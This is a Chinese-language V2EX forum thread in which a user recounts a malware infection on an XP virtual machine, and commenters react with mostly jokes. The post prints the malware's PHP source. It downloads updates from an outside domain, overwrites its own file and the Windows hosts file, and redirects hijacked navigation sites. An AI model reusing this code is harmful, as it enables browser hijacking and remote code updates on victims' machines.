中毒了,我想吐槽一下,这个病毒是谁写的

2013-11-25 21:42:32 +08:00
 jacy
本人有个xp虚拟机,上面没装杀毒软件。有一次不知安装了什么,桌面上总是会自动创建某网站的快捷方式,然后看进程把几个exe删掉就好了。
看进程的时候发现有个apache,我想我没装过啊,而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录,也正常,不像是病毒伪装的。于是想看看是什么,浏览器输入localhost,结果跳转到了某个网站。于是想到hosts被改了,打开hosts,看到localhost是127.0.0.1,没问题啊,再往下一看,好多记录啊,常用的一些导航网站,下载网站,杀毒网站全被解析到了127.x.x.x,于是我似乎明白了什么。立马回到apache目录,发现居然还安装有php,打开htdocs,有个index.php和404.html,打开看了看,觉得这病毒作者很蛋疼啊,有必要为了劫持网站费这么多事嘛,把php和apache都给装上了,是哪个无证程序员写的啊。

贴index.php给大家看看(还自带注释的-_-||):
<?php
include_once "config.php";
$name1 = "www.2345.com,2345.com";
$name2 = "www.tao123.com,tao123.com";
//$name3 = "www.hao123.com,hao123.com";

//获取最新php

$index = file_get_contents('http://www.129129.com/ht/index.txt');
if(strpos($index, '@')!==false)
{
$arr = explode("@", $index);

$index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
}

//获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化

$serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:http://www.129129.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:http://www.129129.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:http://www.129129.com/?3");exit;
break;
default:
header("Location:http://www.129129.com/?4");exit;
break;
}

?>
<meta http-equiv="refresh" content="0;url=http://www.129129.com/?301">

config.php:
<?php
function get_rep($index)
{
return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
}
?>
11843 次点击
所在节点    程序员
46 条回复
wheatcuican
2013-11-26 09:54:30 +08:00
还自带注释,噗~
xiaket
2013-11-26 10:15:30 +08:00
真有创意...
sun019
2013-11-26 10:19:58 +08:00
创意啊 不错 收藏了
meta
2013-11-26 10:21:22 +08:00
这得多大一个体积的病毒啊。
wingoo
2013-11-26 10:48:10 +08:00
关键是杀毒软件不杀..
justfindu
2013-11-26 11:14:47 +08:00
还写注释~ 这习惯真好啊
tuzi
2013-11-26 11:23:14 +08:00
这思路绝了,可惜没用在正路上!
Legend
2013-11-26 11:31:07 +08:00
refresh
2013-11-26 12:23:09 +08:00
难道杀毒软件不管个性hosts么,hosts需要权限吧
summic
2013-11-26 12:30:11 +08:00
思路牛逼,估计那家伙很快就会用几十k的webserver换掉apache和php
kfll
2013-11-26 12:40:53 +08:00
还好只是跳转……要是直接在本地搭钓鱼站……还能随时更新……简直……
josephok
2013-11-26 14:22:57 +08:00
XD
lucker6666
2013-11-26 14:29:34 +08:00
@kfll 这思路 nb了
erse
2013-11-26 14:38:30 +08:00
牛逼的思路,这可以算是流量么?
kran
2013-11-26 14:57:33 +08:00
能把apache装上那简直是不容易了,手动安装我都嫌烦。。
zjgsamuel
2013-11-26 16:21:54 +08:00
这肉鸡使的 学习了!!
tywtyw2002
2013-11-26 17:37:47 +08:00
我还见过一个木马呢,把某个webhosting的母鸡给入侵了。
自己编译了一个新的nginx,在这个nginx里面加入了功能,随机把网页302倒色情广告联盟,然后加上cookie,这样用户第二次访问就不会跳转了。。。。。
然后把老的nginx文件给替换成一个sh脚本。。。。
aivier
2013-11-26 17:42:01 +08:00
好吧,无敌了,竟然还可以这样写恶意软件。。。!
chengzi
2013-11-26 21:06:17 +08:00
注释好习惯
codegear
2013-11-26 23:23:37 +08:00
莫名的喜感啊!

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/90587

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX